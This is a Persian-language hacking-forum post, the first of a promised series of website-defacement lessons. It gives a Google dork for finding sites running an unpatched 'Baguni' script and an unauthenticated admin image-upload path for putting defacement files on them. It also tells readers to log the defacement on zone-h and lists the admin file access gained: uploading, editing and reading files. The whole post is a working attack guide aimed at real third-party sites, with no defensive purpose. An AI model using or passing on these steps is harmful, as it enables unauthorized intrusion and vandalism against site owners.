سری آموزش های وب هکیینگ ( پارت 1 )

[DangerBoY]

به نام برنامه نویس هستی

 

سلام به تمام اعضای انجمن گارد ایران Danger BoY هستم . در این سری آموزش ها هروز حداقل یک آموزش هک سایت و دیفیس آن قرار میگیرد . که اکثرش توسط خودم آپلود میشه و خدمت شما قرار میگیره و گاهی هم از بعضی از هم تیمی های سابق ام براتون آموزش میزارم  این سری آموزش ها مخصوص دیفیسرا هستش و بعضی از باگ هایی ک قرار میدم هم برای هکرها مناسبه . اولین آموزش امروز در همین پست قرار میگیره که هم مخصوص دیفیسرا هستش هم هکرها

 

===============================================================================================================

 

Bug name : Baguni

 

وضعیت : پچ نشده

 

تعداد سایت های دارای این باگ در گوگل : About 264 results

 

اکثرا سایت های ژاپنی و چینی و کره ای این باگ رو دارن

 

===============================================================================================================

 

آموزش این باگ برای دیفیسرا :

 

ابتدا دورک زیر رو توی گوگل سرچ کنید :

 

inurl:"/index.php?page=baguni

 

از بین سایت های آمده یکی رو انتخاب کنید و سپس اکسپلویت زیر رو به سایت طزریق کنید :

 

/admin/htmlarea/popups/insert_image.php

 

سپس در صفحه آمده کلید Brows رو بزنید و دیفیس خودتون رو انتخاب کنید و بعدش کلید Upload رو بزنید و تمااااام برید توی zone ثبتش کنید .

 

=============================================================================================================

 

آموزش این باگ برای هکرها :

 

وقتی اکسپلوت رو طزریق کردید وارد پنل ادمین میشید . و به تمام فایل های manager دسترسی پیدا میکنید از جمله امکاناتی که پیدا میکنید :

 

1- امکان Upload و Download فایل ها

2- امکان Edit فایل های Index ادمین و سایت

3- امکان خواندن فایل ها و وارد شدن به فولدر های ادمین

 

=============================================================================================================

 

در آخر چند نکته برای این باگ

 

( فقط دیفیس های jpg  png  txt  قابل آپلود شدن هستن )

( قابل ثبت در zone و zone-h )

 

 

در آخر تشکر یادتون نره

 

یاعلی